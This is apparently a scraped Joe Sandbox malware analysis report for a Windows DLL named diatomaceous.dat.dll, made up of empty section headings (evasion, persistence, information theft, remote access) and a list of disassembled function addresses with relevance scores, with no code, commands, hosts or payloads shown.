Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

World Map of Contacted IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\Desktop\diatomaceous.dat.dll

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Exports

Possible Origin

Network Behavior

Statistics

CPU Usage

Memory Usage

Windows Analysis Report
diatomaceous.dat.dll

Function 6DA514D0 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 192
filememoryCOMMON

Function 6DA59988 Relevance: 10.6, APIs: 7, Instructions: 136
COMMONLIBRARYCODE

Function 6DA59A38 Relevance: 7.6, APIs: 5, Instructions: 87
COMMONLIBRARYCODE

Function 6DA6A221 Relevance: 6.1, APIs: 4, Instructions: 74
COMMON

Function 6DA59881 Relevance: 3.1, APIs: 2, Instructions: 76
COMMON

Function 6DA6580C Relevance: 3.1, APIs: 2, Instructions: 65
COMMON

Function 6DA6458B Relevance: 1.5, APIs: 1, Instructions: 32
memoryCOMMONLIBRARYCODE

Function 6DA52E60 Relevance: 21.3, APIs: 14, Instructions: 344
encryptionCOMMON

Function 6DA6BFAE Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 251
COMMONLIBRARYCODE

Function 6DA6CC86 Relevance: 10.2, APIs: 1, Strings: 4, Instructions: 1436
COMMONCrypto

Function 6DA6C73D Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 85
COMMONLIBRARYCODE

Function 6DA6C912 Relevance: 7.7, APIs: 5, Instructions: 183
COMMONLIBRARYCODE

Function 6DA648FC Relevance: 6.3, APIs: 4, Instructions: 337
COMMONCrypto

Function 6DA59EC6 Relevance: 6.1, APIs: 4, Instructions: 73
COMMONLIBRARYCODE

Function 6DA6C3C1 Relevance: 4.7, APIs: 3, Instructions: 205
COMMON

Function 6DA5D8C3 Relevance: 4.6, APIs: 3, Instructions: 77
COMMONLIBRARYCODE

Function 6DA604A0 Relevance: 3.4, APIs: 2, Instructions: 449
COMMONCrypto

Function 6DA65CF6 Relevance: 1.8, APIs: 1, Instructions: 274
COMMONLIBRARYCODECrypto

Function 6DA59CE5 Relevance: 1.6, APIs: 1, Instructions: 144
COMMON

Function 6DA694B5 Relevance: 1.6, APIs: 1, Instructions: 140
COMMON

Function 6DA5F07E Relevance: 1.6, Strings: 1, Instructions: 344
COMMONCrypto

Function 6DA6C614 Relevance: 1.6, APIs: 1, Instructions: 83
COMMON

Function 6DA6C29B Relevance: 1.6, APIs: 1, Instructions: 63
COMMONLIBRARYCODE